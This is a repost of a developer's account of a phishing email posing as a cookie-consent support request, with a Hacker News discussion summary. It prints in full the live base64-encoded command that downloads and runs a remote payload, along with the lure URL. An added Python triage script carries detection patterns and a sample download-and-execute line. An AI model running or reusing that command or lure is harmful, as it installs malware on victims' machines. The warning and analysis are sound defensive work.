The scariest "user support" email I've received

Original link: https://www.devas.life/the-scariest-user-support-email-ive-ever-received/

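## Beware of Sophisticated Phishing Attacks

Developer Takuya recently experienced an unsettling phishing attempt in which the attacker targeted him through a seemingly harmless support request. An email claimed that his website could not be accessed because of a cookie consent problem (a problem his website does not even have). After he politely asked for more information, he received a follow-up email containing a link to a "screenshot". Gmail had flagged that link as spam, but Takuya initially trusted it.

Clicking the link led to a deceptive page that asked for a "verification step" involving a terminal command. Realizing the danger, Takuya did not execute it, and confirmed that it was a malicious script designed to download and run code from a remote server.

The experience highlights increasingly sophisticated phishing tactics that are disguised as legitimate support requests and use convincing but slightly flawed communication. Takuya also noticed suspicious, possibly AI-generated posts on his forum. He urges developers to stay vigilant, because attackers are getting smarter and harder to detect. **Never execute commands from untrusted sources.**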

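## Hacker News Discussion Summary: Phishing Attacks and Reliance on AI

A Hacker News thread discussed a recent phishing attempt in which a user received a support request containing a base64-encoded string designed to execute malicious code on macOS systems. The decoded string downloads and runs a remote access trojan (RAT) capable of stealing sensitive data.

The discussion highlighted concern about the growing number of phishing attacks that are not very sophisticated but may still be effective. Many commenters were disappointed that tools such as ChatGPT were needed to analyze such a string, arguing that basic skills like base64 decoding should be familiar to developers and technically proficient users.

A key point of debate was whether using ChatGPT to analyze code is a prudent security measure (it runs in a sandboxed environment) or a sign of declining technical skills. Several users pointed out inaccuracies in ChatGPT's output in this particular case.

The thread also touched on broader issues, such as the growing complexity of online security, the role of large technology companies in enabling scams (for example, Google Sites), and the possibility that AI can both help with and worsen these threats. The general concern is that, as technical skills decline, individuals will become more vulnerable to increasingly sophisticated attacks.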

Original text

Hi, it's Takuya. As your app grows in popularity, you occasionally start to attract attacks aimed directly at you—the developer or site owner. Just the other day, I got one that was honestly terrifying, so I'd like to share it.

The Email

Subject: Cookie consent prevents platform access

Hello,
I cannot access use the store.
The cookie consent notice keeps appearing and nothing happens once I approve or try to close it, so I’m unable to
interact with the website.
Please provide guidance on how to resolve this or provide an alternative solution so I can access?

In short, they’re saying:

“I can’t use your site because the cookie consent keeps blocking access.”

Weird already — because my app’s website, https://www.inkdrop.app/, doesn’t even show a cookie consent dialog. I don’t track or serve ads, so there’s no need for that.

Still, I replied politely:

Can you tell me which Url, your OS, and browser?
Kind regards,
Takuya

A bit later, I got this reply (which Gmail had automatically placed in the spam folder):

Hey,
Thanks for your previous guidance.
I'm still having trouble with access using the latest version of Firefox on Windows
It's difficult to describe the problem so I've included a screenshot.
https://sites.google.com/view/drive-845fro3buhxi/screen?fileid=15034204
Please take a look and suggest the next steps.

At first glance, it looked perfectly normal. But notice — they never actually told me which page was causing the issue. Instead, they sent a link claiming to contain a screenshot. It looked like a Google Drive link, but it was actually a Google Sites page. Without thinking, I clicked it. (You should never do this!)

The Trap

It showed a Captcha screen.
I clicked it… and got this:

It said something like “verification step” — telling me to open a terminal, paste a command, and run it. That’s when it hit me: “Oh no, this is phishing.”

The command they had copied to my clipboard was this:

echo -n Y3VybCAtc0wgLW8gL3RtcC9wakttTVVGRVl2OEFsZktSIGh0dHBzOi8vd3d3LmFtYW5hZ2VuY2llcy5jb20vYXNzZXRzL2pzL2dyZWNhcHRjaGE7IGNobW9kICt4IC90bXAvcGpLbU1VRkVZdjhBbGZLUjsgL3RtcC9wakttTVVGRVl2OEFsZktS | base64 -d | bash

Never run anything like this in your terminal. It downloads and executes a shell script from a remote server — as ChatGPT confirmed when I asked it to analyze it:

Absolutely terrifying.
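One way to read what a pasted `echo … | base64 -d | bash` one-liner would do without running it, as an added example that is not part of the original post. The function name `triage`, the indicator patterns, and the sample command (with its `example.invalid` host) are constructed for illustration.

```python
import base64
import binascii
import re

# Base64 runs long enough to hide a command (the 16-character floor is an assumption).
B64_RUN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
# A decode step whose output is piped straight into a shell interpreter.
DECODE_TO_SHELL = re.compile(r"base64\s+(-d|-D|--decode)\b[^|]*\|\s*(ba|z|da)?sh\b")
# Traits of a download-and-execute stager, checked against the decoded text only.
INDICATORS = {
    "downloads a remote file": re.compile(r"\b(curl|wget)\b[^;|&]*https?://"),
    "marks a file executable": re.compile(r"\bchmod\s+\+x\b"),
    "runs a file from a temp directory": re.compile(r"(^|[;&|]\s*)(/tmp|/var/tmp)/\S+"),
}


def triage(pasted: str) -> dict:
    """Decode base64 payloads in a pasted command for reading. Nothing is executed."""
    report = {"pipes_decoded_text_to_shell": bool(DECODE_TO_SHELL.search(pasted)),
              "decoded": [], "findings": []}
    for blob in B64_RUN.findall(pasted):
        try:
            text = base64.b64decode(blob, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue  # not base64-encoded text, ignore this run
        if not text.replace("\n", " ").isprintable():
            continue  # decoded to control characters, not a readable command
        report["decoded"].append(text)
        for label, pattern in INDICATORS.items():
            if pattern.search(text) and label not in report["findings"]:
                report["findings"].append(label)
    return report


# Constructed sample with the same shape as the command above; the inner
# command and the example.invalid host are made up for this demonstration.
INNER = b"curl -sL -o /tmp/demo https://example.invalid/x; chmod +x /tmp/demo; /tmp/demo"
SAMPLE = "echo -n " + base64.b64encode(INNER).decode() + " | base64 -d | bash"

if __name__ == "__main__":
    result = triage(SAMPLE)
    print("pipes decoded text to a shell:", result["pipes_decoded_text_to_shell"])
    for line in result["decoded"]:
        print("decoded:", line)
    for finding in result["findings"]:
        print("finding:", finding)
```
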

Because Gmail had flagged the second message as spam, the URL was probably already reported as malicious. But the first message wasn’t flagged — so I thought, “Maybe it’s a false positive,” and replied. Big mistake.

Even on my user forum, I’ve started seeing suspicious posts that seem to be written by AI. They look natural at first glance, but the intent is unclear — often just spam or trolling.

Phishing emails disguised as support inquiries are getting more sophisticated, too.
They read naturally, but something always feels just a little off — the logic doesn’t quite line up, or the tone feels odd.

It’s unsettling. Stay alert, guys — the attacks are getting smarter. Hope it's helpful!
